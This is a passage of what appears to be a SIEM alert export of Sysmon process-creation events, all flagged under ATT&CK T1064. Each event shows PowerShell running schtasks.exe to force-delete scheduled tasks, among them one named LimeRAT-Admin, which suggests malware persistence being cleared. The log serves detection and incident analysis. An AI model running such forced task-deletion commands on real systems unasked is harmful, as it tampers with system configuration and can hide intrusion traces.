(WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.139",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.711 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010280f2c00} +ProcessId: 7088 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.713351800Z"",""eventRecordID"":""3339"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.711\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010280f2c00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.711"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010280f2c00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.117",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.688 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b90c2c00} +ProcessId: 7628 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.691194700Z"",""eventRecordID"":""3338"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.688\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b90c2c00}\r\nProcessId: 7628\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.688"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010b90c2c00}"",""processId"":""7628"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.083",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.665 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010c70a2c00} +ProcessId: 6348 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.667261600Z"",""eventRecordID"":""3337"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.665\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010c70a2c00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.665"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010c70a2c00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.073",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.643 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010df082c00} +ProcessId: 7260 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.645488300Z"",""eventRecordID"":""3336"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.643\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010df082c00}\r\nProcessId: 7260\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.643"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010df082c00}"",""processId"":""7260"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.037",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.621 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b5062c00} +ProcessId: 7336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.623770400Z"",""eventRecordID"":""3335"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.621\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b5062c00}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.621"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010b5062c00}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.029",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.597 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100e042c00} +ProcessId: 360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.599158100Z"",""eventRecordID"":""3334"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.597\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100e042c00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.597"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00100e042c00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 